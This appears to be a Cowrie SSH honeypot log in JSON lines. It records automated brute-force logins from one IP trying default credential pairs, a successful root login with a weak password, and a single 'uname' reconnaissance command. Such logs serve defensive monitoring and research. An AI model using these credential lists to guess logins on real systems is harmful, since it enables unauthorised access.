{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44586,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cba6f3a0f00","protocol":"ssh","message":"New connection: 212.227.125.160:44586 (1.2.3.4:22) [session: 0cba6f3a0f00]","sensor":"my-vps","timestamp":"2025-08-26T22:01:22.726894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:22.727588Z","src_ip":"212.227.125.160","session":"0cba6f3a0f00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:22.780289Z","src_ip":"212.227.125.160","session":"0cba6f3a0f00"}
{"eventid":"cowrie.login.failed","username":"labuser","password":"labuser","message":"login attempt [labuser/labuser] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:22.974940Z","src_ip":"212.227.125.160","session":"0cba6f3a0f00"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:24.085261Z","src_ip":"212.227.125.160","session":"0cba6f3a0f00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39974,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6227ebb1c8e","protocol":"ssh","message":"New connection: 212.227.125.160:39974 (1.2.3.4:22) [session: e6227ebb1c8e]","sensor":"my-vps","timestamp":"2025-08-26T22:01:28.743238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:28.753308Z","src_ip":"212.227.125.160","session":"e6227ebb1c8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:28.817183Z","src_ip":"212.227.125.160","session":"e6227ebb1c8e"}
{"eventid":"cowrie.login.failed","username":"odoo14","password":"odoo14","message":"login attempt [odoo14/odoo14] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:29.071762Z","src_ip":"212.227.125.160","session":"e6227ebb1c8e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:30.130316Z","src_ip":"212.227.125.160","session":"e6227ebb1c8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35362,"dst_ip":"1.2.3.4","dst_port":22,"session":"a660847227f7","protocol":"ssh","message":"New connection: 212.227.125.160:35362 (1.2.3.4:22) [session: a660847227f7]","sensor":"my-vps","timestamp":"2025-08-26T22:01:35.400436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:35.401542Z","src_ip":"212.227.125.160","session":"a660847227f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:35.451866Z","src_ip":"212.227.125.160","session":"a660847227f7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:35.619009Z","src_ip":"212.227.125.160","session":"a660847227f7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:36.672323Z","src_ip":"212.227.125.160","session":"a660847227f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58980,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1d9d4ce06c3","protocol":"ssh","message":"New connection: 212.227.125.160:58980 (1.2.3.4:22) [session: d1d9d4ce06c3]","sensor":"my-vps","timestamp":"2025-08-26T22:01:40.140974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:40.152305Z","src_ip":"212.227.125.160","session":"d1d9d4ce06c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:40.198311Z","src_ip":"212.227.125.160","session":"d1d9d4ce06c3"}
{"eventid":"cowrie.login.failed","username":"trytan","password":"trytan","message":"login attempt [trytan/trytan] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:40.402654Z","src_ip":"212.227.125.160","session":"d1d9d4ce06c3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:41.807337Z","src_ip":"212.227.125.160","session":"d1d9d4ce06c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54368,"dst_ip":"1.2.3.4","dst_port":22,"session":"1432eae92866","protocol":"ssh","message":"New connection: 212.227.125.160:54368 (1.2.3.4:22) [session: 1432eae92866]","sensor":"my-vps","timestamp":"2025-08-26T22:01:45.939991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:45.954172Z","src_ip":"212.227.125.160","session":"1432eae92866"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:46.047389Z","src_ip":"212.227.125.160","session":"1432eae92866"}
{"eventid":"cowrie.login.failed","username":"grid","password":"grid","message":"login attempt [grid/grid] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:46.931318Z","src_ip":"212.227.125.160","session":"1432eae92866"}
{"eventid":"cowrie.session.connect","src_ip":"180.110.122.5","src_port":59094,"dst_ip":"1.2.3.4","dst_port":23,"session":"248ca11cecd2","protocol":"telnet","message":"New connection: 180.110.122.5:59094 (1.2.3.4:23) [session: 248ca11cecd2]","sensor":"my-vps","timestamp":"2025-08-26T22:01:47.383435Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:47.985802Z","src_ip":"212.227.125.160","session":"1432eae92866"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb3cf3f461fd","protocol":"ssh","message":"New connection: 212.227.125.160:49754 (1.2.3.4:22) [session: eb3cf3f461fd]","sensor":"my-vps","timestamp":"2025-08-26T22:01:52.505477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:52.506228Z","src_ip":"212.227.125.160","session":"eb3cf3f461fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:52.551672Z","src_ip":"212.227.125.160","session":"eb3cf3f461fd"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:52.703378Z","src_ip":"212.227.125.160","session":"eb3cf3f461fd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:53.756149Z","src_ip":"212.227.125.160","session":"eb3cf3f461fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45142,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cd7bf309aa8","protocol":"ssh","message":"New connection: 212.227.125.160:45142 (1.2.3.4:22) [session: 6cd7bf309aa8]","sensor":"my-vps","timestamp":"2025-08-26T22:01:57.797395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:57.801576Z","src_ip":"212.227.125.160","session":"6cd7bf309aa8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:57.850801Z","src_ip":"212.227.125.160","session":"6cd7bf309aa8"}
{"eventid":"cowrie.login.failed","username":"gnats","password":"gnats","message":"login attempt [gnats/gnats] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:58.470778Z","src_ip":"212.227.125.160","session":"6cd7bf309aa8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:59.543309Z","src_ip":"212.227.125.160","session":"6cd7bf309aa8"}
{"eventid":"cowrie.session.closed","duration":13.924004316329956,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:01.307369Z","src_ip":"180.110.122.5","session":"248ca11cecd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40528,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aefce5a37a4","protocol":"ssh","message":"New connection: 212.227.125.160:40528 (1.2.3.4:22) [session: 5aefce5a37a4]","sensor":"my-vps","timestamp":"2025-08-26T22:02:03.230929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:03.234678Z","src_ip":"212.227.125.160","session":"5aefce5a37a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:03.286488Z","src_ip":"212.227.125.160","session":"5aefce5a37a4"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:03.486593Z","src_ip":"212.227.125.160","session":"5aefce5a37a4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:04.553226Z","src_ip":"212.227.125.160","session":"5aefce5a37a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35914,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ab984baec3a","protocol":"ssh","message":"New connection: 212.227.125.160:35914 (1.2.3.4:22) [session: 8ab984baec3a]","sensor":"my-vps","timestamp":"2025-08-26T22:02:08.897289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:08.913471Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:08.973202Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:02:09.207781Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:02:09.412904Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:02:09.413653Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:09.495747Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:09.496970Z","src_ip":"212.227.125.160","session":"8ab984baec3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59532,"dst_ip":"1.2.3.4","dst_port":22,"session":"f23894541383","protocol":"ssh","message":"New connection: 212.227.125.160:59532 (1.2.3.4:22) [session: f23894541383]","sensor":"my-vps","timestamp":"2025-08-26T22:02:14.695108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:14.696266Z","src_ip":"212.227.125.160","session":"f23894541383"}
